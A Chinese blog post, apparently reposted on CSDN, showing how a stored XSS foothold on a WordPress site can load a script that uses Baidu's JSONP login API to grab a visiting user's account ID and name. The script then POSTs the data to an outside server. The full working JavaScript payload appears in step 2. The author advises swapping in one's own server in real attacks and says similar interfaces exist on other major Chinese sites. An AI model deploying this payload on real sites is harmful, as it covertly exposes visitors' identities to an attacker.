XSS结合JSONP获取网站访客社交账号信息

最新推荐文章于 2024-05-17 13:52:13 发布
最新推荐文章于 2024-05-17 13:52:13 发布
阅读量1k 收藏 1
点赞数
文章标签: javascript 前端 php ViewUI
原文链接:http://www.cnblogs.com/dgjnszf/p/10793535.html
版权

  我在本地环境搭建了一个WordPress网站,并在该网站中植入JavaScript文件。如果访客在浏览网站时登录了百度账号,该js文件能够利用JSONP获取网站访客的百度账号信息。

具体情况如下:

1、首先修改WordPress的footer.php文件,引入2个外部JavaScript文件。第一个是jQuery库,第二个是jsonp代码。在实际渗透中,如果该网站存在存储型XSS漏洞,我们就可以将xss_jsonp.js文件植入进去。

2、xss_jsonp.js文件内容如下,具体功能是通过JSONP获取百度账号信息,并上传到服务器上。为了做演示,这里我把获取到的信息上传到www.sogou.com,在实际渗透中,你可以把信息上传到自己的服务器上。

 1 function jsonp_baidu() {
 2     window._baidu_1 = function(object) {
 3     if(!object.id) {
 4         return;
 5     }
 6     var data = {};
 7     data.id = object.id;
 8     data.name = object.name;
 9     $.post(saveUrl + '?act=baidu', data);
10     };
11     $.ajax({
12         url: "https://baike.baidu.com/api/login/",
13         type: "GET",
14         dataType: "jsonp",
15         jsonp: 'callback',
16         jsonpCallback: "_baidu_1",
17     });
18 }  
19 var saveUrl = 'https://www.sogou.com/xss_jsonp.php';
20 jsonp_baidu();

3、访问网站并观察刚才植入的js代码是否执行。

访问百度的JSONP接口,服务器返回登录账号的相关信息。

获取到百度账号信息后,上传到www.sogou.com服务器。

 

  目前,我已经找到了百度、淘宝、京东、腾讯、新浪、爱奇艺等多个国内流行网站的JSONP接口,从这些接口可以获取用户账号信息。

 

转载于:https://www.cnblogs.com/dgjnszf/p/10793535.html

weixin_30265103
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
详解JSON和JSONP劫持以及解决方法
10-17
主要介绍了详解JSON和JSONP劫持以及解决方法,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
JSONP获取Twitter和Facebook文章数
铁锚的CSDN博客
02-22 2617
原文链接: Retrieve Twitter and Facebook Counts with JSON 翻译人员: 铁锚 原文日期: 2014年02月19日 翻译日期: 2014年02月22日 !!! 原文是使用的Twitter和Facebook,因为国内被强,所以我觉得有用的是里面一个获取JSONP的那个工具类. 我很头疼的是,许多流行的 APIs 已经要求身份验证才能获取
xssjsonp的简单理解
aobeng7073的博客
09-20 217
xss:cross site script 跨站脚本 通过用户提交恶意脚本,所以要对用户提交进行编码 jsonp: 跨域请求,ajax不能跨域 src属性都能请求跨域内容,img、iframe和script标签;通过src传递内容给另一个域的服务器,它再根据内容,返回js代码。 转载于:https://www.cnblogs.com/miaolq/p/5890622.ht...
JS 使用 JSONP 跨域获取用户IP
一直专注于互联网
09-22 610
<!DOCTYPE html> <html lang="zh-cn"> <head> <meta charset="UTF-8"> <title></title> <script src="jquery-1.10.1.min.js">&
web蜜罐jsonp抓取信息探究
ATpiu的博客
05-16 2747
web蜜罐抓取攻击方信息(jsonhijack)研究
通过代码审计找出网站中的XSS漏洞实战
02-24
反向审计打蛇打七寸,说明在关键位置做事效率会更高,代码审计找出漏洞也是同理,因此笔者需要找出XSS关键的位置;对于目前的大多数Web应用来说,MVC模式是非常主流的一种形式,因此笔者这里将找到对应的控制器和模板...
第四节 XSS盗取用户信息-01
09-15
第四节 XSS盗取用户信息-01
XSS平台网站源码.zip
09-28
XSS平台网站源码,有利于辅助xss跨站脚本学习XSS平台网站源码,有利于辅助xss跨站脚本学习
JSONP接口
wcgdecsdn的博客
11-08 348
jsonp请求
【笔记】通过jsonp方式获取用户ip地址
hamal_ye的博客
11-24 1474
此处用到第三方接口,有可能以后会失效:http://pv.sohu.com/cityjson 方式一:用ajax(不在第三方接口的白名单内,会跨域) $.ajax({ type: "GET", url: 'https://pv.sohu.com/cityjson', cache: false, async: false, dataType: "json", success: function (res) { alert(res);
jsonp解决跨域(案例:动态获取百度数据)
放手
07-24 346
jsonp了解一下,只要你看了,相信你就能懂! 首先我们先简单回忆一下ajax,ajax我们都不陌生,经常用,ajax的优点是不刷新整个页面从后台获取数据,但是也有缺点啊,不能跨域啊!但是好多时候我们还就得跨域请求数据。所以jsonp出场了。 必须清楚的一点,json和jsonp是没有任何关系的。jsonp是一种可以跨域获取数据的手段。 jsonp实现原理:动态创建script标签,在全局设置一个...
XSS盗取用户信息实验(详细)及xss之旅闯关
m0re's blog
05-29 1178
本文目录前言小实验实验环境实验实验过程xss之旅 前言 近段时间学习xss,进行了比较详细的了解,也学了一个小实验,感觉挺有意思,记录下来。然后,后面就是xss之旅的闯关。 小实验 实验环境 DVWA、kali linux、物理机或一台windows系统的虚拟机。 实验 实验原理: 克隆网站登录页面,利用存储xss设置跳转代码,如果用户访问即跳转到克隆网站的登录页面,用户输入登录,账号和密码被存储...
ant design DatePicker日期选择框指定分钟的间隔minuteStep属性
最新发布
u010234868的专栏
05-17 195
在上面的例子中,DatePicker 将只允许用户以 15 分钟为间隔选择分钟。是 Ant Design 的 TimePicker时间选择框组件的一个属性。设置为 30,则用户可以选择以 30 分钟为间隔的分钟值。如果你想让分钟选项只能以 15 分钟为间隔选择,你可以将。
(Vue3+TS+Volar) 全局组件配置类型声明的最佳实践
从今年开始写写博客~~
05-14 231
简评:Volar官方全局组件的推荐写法,基于Volar,必须安装该插件,GlobalComponents是Volar专门为了解决全局组件类型而新增的类型接口。定义全局组件:使用GlobalComponents类型接口声明类型。
Vue.js的发展史(一)
2301_79683791的博客
05-15 755
Vue (发音为 /vjuː/,类似view) 是一款用于构建用户界面的 JavaScript 框架。它基于标准 HTML、CSS 和 JavaScript 构建,并提供了一套声明式的、组件化的编程模型,帮助你高效地开发用户界面。无论是简单还是复杂的界面,Vue 都可以胜任。来源官方解释-----简介 | Vue.js (vuejs.org)简单来说:Vue是一个属于JS的库,可直接引入一个JS文件就可以使用,与传统JS和JQuery框架不同,Vue的渐进式框架。
setImmediate不能在浏览器中执行
Keep trying, keep going
05-14 163
的延迟时间设置为 0,但实际的延迟可能会因浏览器的最小延迟时间限制而稍有不同。函数实现类似的效果。函数不是浏览器的标准 API,而。
Vue3详细讲解
贫僧法号依平
05-15 853
Vue 3 介绍为什么要学习 vue 3Vue3 动机 和 新特性Vite 的使用vite介绍为什么选 Vite?Vite 的基本使用Vue3.0项目介绍vscode插件说明组合式API体验 composition APIsetup 函数reactive 函数ref 函数script setup语法(★)案例:显示鼠标案例计算属性computed函数侦听器watch函数钩子函数的使用组件通讯-父传子组件通讯-子传父依赖注入 - provide 和 inject模板中 ref 的使用vue3中废弃了过滤器。
echarts的柱状图使用
qq_45331969的博客
05-15 187
【代码】echarts的柱状图使用。
xss怎么获取目标cookie
08-02
XSS(跨站脚本攻击)是一种常见的网络安全漏洞,攻击者可以通过注入恶意脚本来获取用户的感信息,如cookie。在存储型XSS击中,攻击者将恶意脚本存储在目标网站的数据库中,当其他用户或管理员访问包含该恶意脚本的页面时,脚本会被执行,从而导致用户的cookie信息被窃取。 根据引用[1]提供的信息,攻击者可以在目标网站的博或论坛等地方发表帖子或留下评论,内容包含恶意脚本。当其他用户或管理员打开包含恶意脚本的页面时,脚本会触发并将用户的cookie信息发送到攻击者指定的网站。 引用[2]提供了一个获取cookie的示例代码,其中的cookie.asp文件会将获取到的cookie信息写入到code.txt文件中。攻击者可以通过构造恶意脚本,将cookie信息发送到自己的服务器上。 引用[3]提供了另一种获取cookie的方法,通过将cookie信息作为参数发送到指定的URL,攻击者可以在该URL的服务器上获取到用户的cookie信息。 总结来说,攻击者可以通过存储型XSS漏洞,在目标网站上注入恶意脚本,从而获取用户的cookie信息。这些信息可以被用于未授权访问用户账户等恶意行为。为了防止XSS攻击,网站开发者应该对用户输入进行严格的过滤和转义,以防止恶意脚本的注入。用户也应该保持浏览器和操作系统的更新,并避免点击可疑的链接或下载未知来源的文件,以减少受到XSS攻击的风险。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值